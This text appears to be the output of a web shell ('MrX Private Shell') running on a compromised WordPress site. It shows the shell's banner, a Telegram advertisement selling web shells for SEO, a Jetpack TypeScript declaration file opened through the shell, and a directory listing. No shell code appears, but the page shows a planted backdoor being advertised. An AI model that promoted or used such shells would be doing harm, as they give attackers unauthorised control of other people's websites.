__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
import { JETPACK_FORM_AI_COMPOSITION_EXTENSION } from './blocks/ai-assistant/extensions/jetpack-contact-form/constants';
import { JETPACK_CREATE_WITH_VOICE_EXTENSION } from './blocks/create-with-voice/constants';
import { SiteAIAssistantFeatureEndpointResponseProps } from './types';
type AvailableBlockProps =
| {
available?: boolean;
}
| undefined;
declare global {
interface Window {
JP_CONNECTION_INITIAL_STATE: {
apiRoot: string;
apiNonce: string;
registrationNonce: string;
connectionStatus: {
isActive: boolean;
isStaging: boolean;
isRegistered: boolean;
isUserConnected: boolean;
hasConnectedOwner: boolean;
offlineMode: {
isActive: boolean;
constant: boolean;
url: boolean;
filter: boolean;
wpLocalConstant: boolean;
};
isPublic: boolean;
};
userConnectionData: {
currentUser: {
isConnected: boolean;
isMaster: boolean;
username: string;
id: number;
blogId: number;
wpcomUser: {
avatar: boolean;
};
gravatar: string;
permissions: {
admin_page?: boolean;
connect: boolean;
connect_user: boolean;
disconnect: boolean;
edit_posts?: boolean;
manage_modules?: boolean;
manage_options?: boolean;
manage_plugins?: boolean;
network_admin?: boolean;
network_sites_page?: boolean;
publish_posts?: boolean;
view_stats?: boolean;
};
};
connectionOwner: null;
};
connectedPlugins: object;
wpVersion: string;
siteSuffix: string;
connectionErrors: Array;
};
Jetpack_Editor_Initial_State: {
available_blocks: {
[ JETPACK_CREATE_WITH_VOICE_EXTENSION ]: AvailableBlockProps;
[ JETPACK_FORM_AI_COMPOSITION_EXTENSION ]: AvailableBlockProps;
};
adminUrl: string;
siteLocale: string;
'ai-assistant': SiteAIAssistantFeatureEndpointResponseProps;
screenBase?: string;
wpcomBlogId?: string;
};
wpcomFetch: function;
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| blocks | Folder | 0755 |
|
|
| extended-blocks | Folder | 0755 |
|
|
| plugins | Folder | 0755 |
|
|
| shared | Folder | 0755 |
|
|
| store | Folder | 0755 |
|
|
| global.d.ts | File | 1.94 KB | 0644 |
|
| types.ts | File | 743 B | 0644 |
|